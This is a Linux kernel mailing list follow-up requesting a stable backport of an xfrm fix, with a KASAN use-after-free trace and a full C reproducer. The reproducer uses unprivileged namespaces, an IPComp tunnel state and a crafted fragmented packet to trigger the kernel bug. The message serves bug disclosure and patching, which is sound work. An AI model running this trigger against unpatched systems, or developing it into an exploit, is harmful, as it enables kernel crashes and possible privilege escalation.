All of lore.kernel.org
 help / color / mirror / Atom feed
From: Slavin Liu <slavin452@gmail.com>
To: stable@vger.kernel.org
Cc: Sabrina Dubroca <sd@queasysnail.net>,
	Steffen Klassert <steffen.klassert@secunet.com>,
	"netdev@vger.kernel.org" <netdev@vger.kernel.org>
Subject: Re: [BUG] Missing backport for commit b441cf3f8c4b ("xfrm: delete= x->tunnel as we delete x")
Date: Sun, 30 Nov 2025 02:24:07 +0800	[thread overview]
Message-ID: <20251129182407.1064-1-slavin452@gmail.com> (raw)
In-Reply-To: <20251118151140.89427-1-slavin452@gmail.com>

Hi all,

Just a gentle follow-up on this backport request with kasan report and 
reproducer.

KASAN Report:
BUG: KASAN: slab-use-after-free in __hlist_del include/linux/list.h:988=
 [inline]
BUG: KASAN: slab-use-after-free in hlist_del_rcu include/linux/rculist.h:=
516 [inline]
BUG: KASAN: slab-use-after-free in __xfrm_state_delete+0x7bb/0x8e0 =
net/xfrm/xfrm_state.c:761
Write of size 8 at addr ffff88802eba0418 by task kworker/0:5/397627

CPU: 0 UID: 0 PID: 397627 Comm: kworker/0:5 Tainted: 6.12.51 #2
Tainted: [W]=WARN
Workqueue: events xfrm_state_gc_task
Call Trace:
 <TASK>
 __dump_stack lib/dump_stack.c:94 [inline]
 dump_stack_lvl+0xd7/0x130 lib/dump_stack.c:120
 print_address_description mm/kasan/report.c:377 [inline]
 print_report+0xc4/0x640 mm/kasan/report.c:481
 kasan_report+0xd8/0x110 mm/kasan/report.c:594
 __hlist_del include/linux/list.h:988 [inline]
 hlist_del_rcu include/linux/rculist.h:516 [inline]
 __xfrm_state_delete+0x7bb/0x8e0 net/xfrm/xfrm_state.c:761
 xfrm_state_delete net/xfrm/xfrm_state.c:795 [inline]
 xfrm_state_delete_tunnel+0x17c/0x1b0 net/xfrm/xfrm_state.c:3014
 ipcomp_destroy+0x4a/0xc0 net/xfrm/xfrm_ipcomp.c:318
 ___xfrm_state_destroy+0x252/0x5c0 net/xfrm/xfrm_state.c:549
 xfrm_state_gc_task+0x111/0x180 net/xfrm/xfrm_state.c:572
 process_one_work+0x8e3/0x1930 kernel/workqueue.c:3229
 process_scheduled_works kernel/workqueue.c:3310 [inline]
 worker_thread+0x781/0x10a0 kernel/workqueue.c:3391
 kthread+0x2fa/0x400 kernel/kthread.c:389
 ret_from_fork+0x4a/0x80 arch/x86/kernel/process.c:152
 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244
 </TASK>

Allocated by task 9:
 kasan_save_stack+0x33/0x60 mm/kasan/common.c:47
 kasan_save_track+0x14/0x30 mm/kasan/common.c:68
 poison_kmalloc_redzone mm/kasan/common.c:377 [inline]
 __kasan_kmalloc+0x8f/0xa0 mm/kasan/common.c:394
 kasan_kmalloc include/linux/kasan.h:260 [inline]
 __do_kmalloc_node mm/slub.c:4313 [inline]
 __kmalloc_noprof+0x219/0x530 mm/slub.c:4325
 kmalloc_noprof include/linux/slab.h:882 [inline]
 kzalloc_noprof include/linux/slab.h:1014 [inline]
 xfrm_hash_alloc+0xd6/0x100 net/xfrm/xfrm_hash.c:21
 xfrm_hash_resize+0x66/0x2310 net/xfrm/xfrm_state.c:170
 [...]

Freed by task 30:
 kasan_save_stack+0x33/0x60 mm/kasan/common.c:47
 kasan_save_track+0x14/0x30 mm/kasan/common.c:68
 kasan_save_free_info+0x3b/0x60 mm/kasan/generic.c:579
 poison_slab_object mm/kasan/common.c:247 [inline]
 __kasan_slab_free+0x37/0x50 mm/kasan/common.c:264
 kasan_slab_free include/linux/kasan.h:233 [inline]
 slab_free_hook mm/slub.c:2374 [inline]
 slab_free mm/slub.c:4632 [inline]
 kfree+0x14a/0x4a0 mm/slub.c:4780
 xfrm_hash_free+0xc1/0xe0 net/xfrm/xfrm_hash.c:35
 xfrm_state_fini+0x226/0x310 net/xfrm/xfrm_state.c:3233
 xfrm_net_exit+0x32/0x70 net/xfrm/xfrm_policy.c:4342
 ops_exit_list+0xb5/0x180 net/core/net_namespace.c:173
 cleanup_net+0x5b8/0xb20 net/core/net_namespace.c:642
 [...]

2. Reproducer
The C reproducer is pasted below.

Given that this UAF is reproducible and reachable from unprivileged=
 namespaces (if unshare is allowed), I suggest backporting commit =
 b441cf3f8c4b to all active LTS branches.

Thanks,
Slavin Liu

---
repro.c:

// gcc repro.c -o poc -lz
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/xfrm.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <netinet/ip.h>
#include <zlib.h>

// =-=-=-=-=-=-=-= CONFIG =-=-=-=-=-=-=-=
#define SPI 0x1100
#define TUNNEL_SRC "172.16.22.148"
#define TUNNEL_DST "172.16.194.141"

// =-=-=-=-=-=-=-= UTILS =-=-=-=-=-=-=-=
#define die(msg) do { perror(msg); exit(EXIT_FAILURE); } while(0)

void write_file(const char * filename, const char * buf) {
    int fd = open(filename, O_WRONLY | O_CLOEXEC);
    if (fd < 0) die("open");
    if (write(fd, buf, strlen(buf)) != strlen(buf)) die("write");
    close(fd);
}

/*
 * Create a new user and network namespace.
 * This allows an unprivileged user to configure XFRM interfaces and rules.
 */
static void init_namespace() {
    char uid_map[128];
    char gid_map[128];
    uid_t uid = getuid();
    gid_t gid = getgid();

    if (unshare(CLONE_NEWUSER | CLONE_NEWNS | CLONE_NEWNET | CLONE_NEWIPC))
        die("unshare");

    sprintf(uid_map, "0 %d 1\n", uid); 
    sprintf(gid_map, "0 %d 1\n", gid);

    write_file("/proc/self/uid_map", uid_map);
    write_file("/proc/self/setgroups", "deny");
    write_file("/proc/self/gid_map", gid_map);
}

static void bring_interface_up(const char *ifname)
{
    int sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd < 0) die("socket");

    struct ifreq ifr;
    memset(&ifr, 0, sizeof ifr);
    strncpy(ifr.ifr_name, ifname, IFNAMSIZ - 1);
    if (ioctl(sockfd, SIOCSIFFLAGS, &ifr) < 0) die("SIOCGIFFLAGS");
    ifr.ifr_flags |= IFF_UP;
    if (ioctl(sockfd, SIOCSIFFLAGS, &ifr) < 0) die("SIOCSIFFLAGS");
    close(sockfd);
}

// =-=-=-=-=-=-=-= XFRM UTILS =-=-=-=-=-=-=-=
int nlfd;

/*
 * Helper to add IP addresses using netlink
 */
int add_ip_address(const char *ifname, const char *ip, int prefix_len) {
    struct {
        struct nlmsghdr n;
        struct ifaddrmsg ifa;
        char buf[256];
    } req;
    
    struct sockaddr_nl nladdr;
    struct rtattr *rta;
    int sockfd;
    int ifindex;
    struct in_addr addr;
    
    ifindex = if_nametoindex(ifname);
    if (ifindex == 0) die("if_nametoindex");
    
    if (inet_pton(AF_INET, ip, &addr) != 1)
        die("Invalid IP address");
    
    sockfd = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
    if (sockfd < 0) die("socket");
    
    memset(&req, 0, sizeof(req));
    req.n.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifaddrmsg));
    req.n.nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL | NLM_F_ACK;
    req.n.nlmsg_type = RTM_NEWADDR;
    
    req.ifa.ifa_family = AF_INET;
    req.ifa.ifa_prefixlen = prefix_len;
    req.ifa.ifa_flags = IFA_F_PERMANENT;
    req.ifa.ifa_scope = RT_SCOPE_UNIVERSE;
    req.ifa.ifa_index = ifindex;
    
    rta = (struct rtattr *)(((char *)&req) + NLMSG_ALIGN(req.n.nlmsg_len));
    rta->rta_type = IFA_LOCAL;
    rta->rta_len = RTA_LENGTH(sizeof(addr));
    memcpy(RTA_DATA(rta), &addr, sizeof(addr));
    req.n.nlmsg_len = NLMSG_ALIGN(req.n.nlmsg_len) + rta->rta_len;
    
    memset(&nladdr, 0, sizeof(nladdr));
    nladdr.nl_family = AF_NETLINK;
    
    if (sendto(sockfd, &req, req.n.nlmsg_len, 0,
               (struct sockaddr *)&nladdr, sizeof(nladdr)) < 0) 
        die("sendto");
    
    char buf[4096];
    struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
    int len = recv(sockfd, buf, sizeof(buf), 0);
    
    if (len < 0) die("recv");
    
    if (nlh->nlmsg_type == NLMSG_ERROR) {
        struct nlmsgerr *err = (struct nlmsgerr *)NLMSG_DATA(nlh);
        if (err->error != 0)
            die("Netlink error");
    }
    
    close(sockfd);
    return 0;
}

static void configure_lo()
{
    add_ip_address("lo", "10.0.0.0", 8);
    add_ip_address("lo", "172.16.0.0", 12);
    
    write_file("/proc/sys/net/ipv4/conf/lo/rp_filter", "0");
    write_file("/proc/sys/net/ipv4/conf/all/rp_filter", "0");
    
    write_file("/proc/sys/net/ipv4/conf/lo/accept_local", "1");
    write_file("/proc/sys/net/ipv4/conf/all/accept_local", "1");

    // Enable xfrm on lo to allow IPComp processing
    write_file("/proc/sys/net/ipv4/conf/lo/disable_xfrm", "0\n");
    write_file("/proc/sys/net/ipv4/conf/lo/disable_policy", "0\n");
}

static int nl_open_xfrm(void)
{
    int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
    if (fd < 0) die("socket");
    
    struct sockaddr_nl addr = { 
        .nl_family = AF_NETLINK, 
        .nl_pid = (uint32_t)getpid() 
    };
    if (bind(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) die("bind");
    
    struct sockaddr_nl kern = { 
        .nl_family = AF_NETLINK,
        .nl_pid = 0
    };
    if (connect(fd, (struct sockaddr *)&kern, sizeof(kern)) < 0) die("connect");
    
    return fd;
}

/*
 * Constructs an IPComp XFRM state in Tunnel Mode.
 * CRITICAL: This causes the kernel to allocate 'x->tunnel'.
 */
static void xfrm_add_sa_tunnel_ipcomp_v4(uint32_t saddr_be, 
                uint32_t daddr_be, uint32_t spi_be, 
                uint32_t tunnel_src_be, uint32_t tunnel_dst_be)
{
    char req[NLMSG_SPACE(sizeof(struct xfrm_usersa_info)) +
             NLA_ALIGN(NLA_HDRLEN + sizeof(struct xfrm_algo) + 0)];
    memset(req, 0, sizeof(req));

    struct nlmsghdr *nlh = (struct nlmsghdr *)req;
    struct xfrm_usersa_info *sa = (struct xfrm_usersa_info *)NLMSG_DATA(nlh);

    nlh->nlmsg_len   = NLMSG_LENGTH(sizeof(*sa));
    nlh->nlmsg_type  = XFRM_MSG_NEWSA;
    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL;
    nlh->nlmsg_seq   = 1;
    nlh->nlmsg_pid   = (uint32_t)getpid();

    memset(sa, 0, sizeof(*sa));
    sa->id.proto = IPPROTO_COMP;
    sa->id.spi   = spi_be;
    sa->mode     = XFRM_MODE_TUNNEL;
    sa->id.daddr.a4 = tunnel_dst_be;
    sa->saddr.a4     = tunnel_src_be;
    sa->sel.family      = AF_INET;
    sa->sel.daddr.a4    = daddr_be;
    sa->sel.saddr.a4    = saddr_be;
    sa->sel.prefixlen_d = 32;
    sa->sel.prefixlen_s = 32;
    sa->family        = AF_INET;
    sa->replay_window = 0;
    sa->lft.soft_byte_limit          = sa->lft.hard_byte_limit          = XFRM_INF;
    sa->lft.soft_packet_limit        = sa->lft.hard_packet_limit        = XFRM_INF;
    sa->lft.soft_add_expires_seconds = sa->lft.hard_add_expires_seconds = XFRM_INF;
    sa->lft.soft_use_expires_seconds = sa->lft.hard_use_expires_seconds = XFRM_INF;

    struct nlattr *nla = (struct nlattr *)((char*)nlh + NLMSG_ALIGN(nlh->nlmsg_len));
    struct xfrm_algo *algo = (struct xfrm_algo *)((char*)nla + NLA_HDRLEN);

    nla->nla_type = XFRMA_ALG_COMP;
    nla->nla_len  = NLA_HDRLEN + sizeof(*algo);

    memset(algo, 0, sizeof(*algo));
    snprintf(algo->alg_name, sizeof(algo->alg_name), "%s", "deflate");
    algo->alg_key_len = 0;

    nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + NLA_ALIGN(nla->nla_len);

    if (send(nlfd, nlh, nlh->nlmsg_len, 0) < 0)
        die("send");
}

void setup_xfrm_env() {
    init_namespace();
    bring_interface_up("lo");
    configure_lo();
    nlfd = nl_open_xfrm();
    if (nlfd < 0) die("nl_open_xfrm");
}

// =-=-=-=-=-=-=-= PACKET CONSTRUCTION =-=-=-=-=-=-=-=

uint16_t ip_checksum(struct iphdr *iph) {
    uint32_t sum = 0;
    uint16_t *ptr = (uint16_t*)iph;
    int len = iph->ihl * 4;
    
    while (len > 1) {
        sum += *ptr++;
        len -= 2;
    }
    if (len == 1)
        sum += *(uint8_t*)ptr;
    
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    return ~sum;
}

struct ipcomp_hdr {
    uint8_t  nexthdr;
    uint8_t  flags;
    uint16_t cpi;
};

static int deflate_raw(const void *in, size_t in_len, void *out, size_t *out_len)
{
    z_stream strm;
    memset(&strm, 0, sizeof(strm));
    int ret = deflateInit2(&strm,
                           Z_DEFAULT_COMPRESSION,
                           Z_DEFLATED,
                           -15,                 // raw deflate (no zlib header)
                           8,
                           Z_DEFAULT_STRATEGY);
    if (ret != Z_OK) return -1;

    strm.next_in  = (Bytef *)in;
    strm.avail_in = (uInt)in_len;
    strm.next_out = (Bytef *)out;
    strm.avail_out= (uInt)*out_len;

    ret = deflate(&strm, Z_FINISH);
    if (ret != Z_STREAM_END) {
        deflateEnd(&strm);
        return -1;
    }

    *out_len = strm.total_out;
    deflateEnd(&strm);
    return 0;
}

static size_t build_inner_ipv4_packet(uint8_t *buf, size_t buf_cap,
                                      const char *src, const char *dst,
                                      uint16_t id, uint8_t proto,
                                      uint16_t frag_flags_off,
                                      const void *payload, size_t payload_len)
{
    if (buf_cap < sizeof(struct iphdr) + payload_len) return 0;

    struct iphdr *iph = (struct iphdr *)buf;
    memset(iph, 0, sizeof(*iph));
    iph->version  = 4;
    iph->ihl      = 5;
    iph->tos      = 0;
    iph->tot_len  = htons(sizeof(struct iphdr) + payload_len);
    iph->id       = htons(id);
    iph->frag_off = htons(frag_flags_off);
    iph->ttl      = 64;
    iph->protocol = proto;
    iph->saddr    = inet_addr(src);
    iph->daddr    = inet_addr(dst);
    iph->check    = 0;
    iph->check    = ip_checksum(iph);

    memcpy(buf + sizeof(struct iphdr), payload, payload_len);
    return sizeof(struct iphdr) + payload_len;
}

#define INNER_PAY_SZ 1400

/*
 * Sends a crafted packet:
 * Outer: IP -> IPComp (Tunnel Mode)
 * Inner: IP (Fragmented) -> UDP
 *
 * This forces the packet to enter the reassembly queue (gro_cells_receive)
 * after decompression, holding a ref to the IPComp state.
 */
void trigger_fragment_with_secpath() {
    int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (sock < 0) die("socket");

    int one = 1;
    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) < 0)
        die("setsockopt IP_HDRINCL");

    // 1. Construct Inner IPv4 Packet (Fragmented: IP_MF set)
    uint8_t inner_payload[INNER_PAY_SZ];
    memset(inner_payload, 0xAA, sizeof(inner_payload));

    const uint16_t INNER_ID = 0x5678;
    const uint16_t INNER_FRAG_OFFSET = 1400;    // bytes
    // Set More Fragments (IP_MF) to ensure it stays in reassembly queue
    const uint16_t inner_frag_off_field = IP_MF | (INNER_FRAG_OFFSET >> 3);

    uint8_t inner_packet[sizeof(struct iphdr) + INNER_PAY_SZ];
    size_t inner_packet_len = build_inner_ipv4_packet(
        inner_packet, sizeof(inner_packet),
        "10.0.0.2", "10.0.0.1",
        INNER_ID, IPPROTO_UDP,
        inner_frag_off_field,
        inner_payload, sizeof(inner_payload)
    );
    if (!inner_packet_len) die("inner packet too big");

    // 2. Compress the inner packet (IPComp payload)
    uint8_t comp_buf[sizeof(inner_packet) + 128];
    size_t  comp_len = sizeof(comp_buf);
    if (deflate_raw(inner_packet, inner_packet_len, comp_buf, &comp_len) != 0) {
        die("deflate_raw failed");
    }

    // 3. Build outer packet: [outer IP][IPCOMP][compressed bytes]
    uint8_t packet[sizeof(struct iphdr) + sizeof(struct ipcomp_hdr) + sizeof(comp_buf)];
    struct iphdr *outer_iph = (struct iphdr *)packet;

    outer_iph->version = 4;
    outer_iph->ihl     = 5;
    outer_iph->tos     = 0;
    size_t outer_len   = sizeof(struct iphdr) + sizeof(struct ipcomp_hdr) + comp_len;
    outer_iph->tot_len = htons(outer_len);
    outer_iph->id      = htons(0x1234);
    outer_iph->frag_off= htons(IP_DF);
    outer_iph->ttl     = 64;
    outer_iph->protocol= IPPROTO_COMP; // Trigger XFRM Input
    outer_iph->saddr   = inet_addr(TUNNEL_SRC);
    outer_iph->daddr   = inet_addr(TUNNEL_DST);
    outer_iph->check   = 0;

    struct ipcomp_hdr *ipcomp = (struct ipcomp_hdr *)(packet + sizeof(struct iphdr));
    ipcomp->nexthdr = IPPROTO_IPIP;    // decompressed payload is an IPv4 packet
    ipcomp->flags   = 0;
    ipcomp->cpi     = htons(SPI);

    memcpy(packet + sizeof(struct iphdr) + sizeof(struct ipcomp_hdr),
           comp_buf, comp_len);

    outer_iph->check = ip_checksum(outer_iph);

    struct sockaddr_in dest = {
        .sin_family = AF_INET,
        .sin_addr.s_addr = inet_addr(TUNNEL_DST)
    };

    if (sendto(sock, packet, outer_len, 0,
               (struct sockaddr*)&dest, sizeof(dest)) < 0) {
        die("sendto");
    }
    close(sock);
}

// =-=-=-=-=-=-=-= MAIN =-=-=-=-=-=-=-=

int main(int argc, char **argv)
{
    printf("[*] Starting UAF Trigger Loop...\n");
    printf("[*] Ctrl+C to stop.\n");

    while (1) {
        // Fork a child process to run the trigger logic
        if (!fork()) {
            // Child Process:
            
            // 1. Create isolated namespace
            setup_xfrm_env();

            uint32_t inner_src = inet_addr("10.0.0.1");
            uint32_t inner_dst = inet_addr("10.0.0.2");
            uint32_t tunnel_src = inet_addr(TUNNEL_SRC);
            uint32_t tunnel_dst = inet_addr(TUNNEL_DST);
            uint32_t spi = htonl(SPI);
            
            // 2. Add IPComp State (allocates x->tunnel)
            xfrm_add_sa_tunnel_ipcomp_v4(inner_src, inner_dst, spi, 
                                         tunnel_src, tunnel_dst);
            
            // 3. Send packet to sit in reassembly queue (holds ref to xfrm_state)
            trigger_fragment_with_secpath();
            
            // 4. Exit immediately. 
            // This triggers netns teardown:
            // -> ipv4_frags_exit_net (stops reassembly, schedules free work)
            // -> xfrm_net_exit (flushes state, freeing xfrm_hash)
            // If xfrm_state_fini() happens before skb in reassembly get 
            // destroyed -> UAF.
            exit(0);
        }
        
        // Wait for child's netns cleanup to finish
        waitpid(-1, NULL, 0);
        sleep(1); 
    }

    return 0;
}

  reply	other threads:[~2025-11-29 18:25 UTC|newest]

Thread overview: 5+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2025-11-18 15:11 [BUG] Missing backport for commit b441cf3f8c4b ("xfrm: delete x->tunnel as we delete x") Slavin Liu
2025-11-29 18:24 ` Slavin Liu [this message]
2025-12-01 11:14 ` Steffen Klassert
2025-12-09  1:06   ` Slavin Liu
2025-12-09  1:12     ` Greg KH

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=20251129182407.1064-1-slavin452@gmail.com \
    --to=slavin452@gmail.com \
    --cc=netdev@vger.kernel.org \
    --cc=sd@queasysnail.net \
    --cc=stable@vger.kernel.org \
    --cc=steffen.klassert@secunet.com \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body.
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.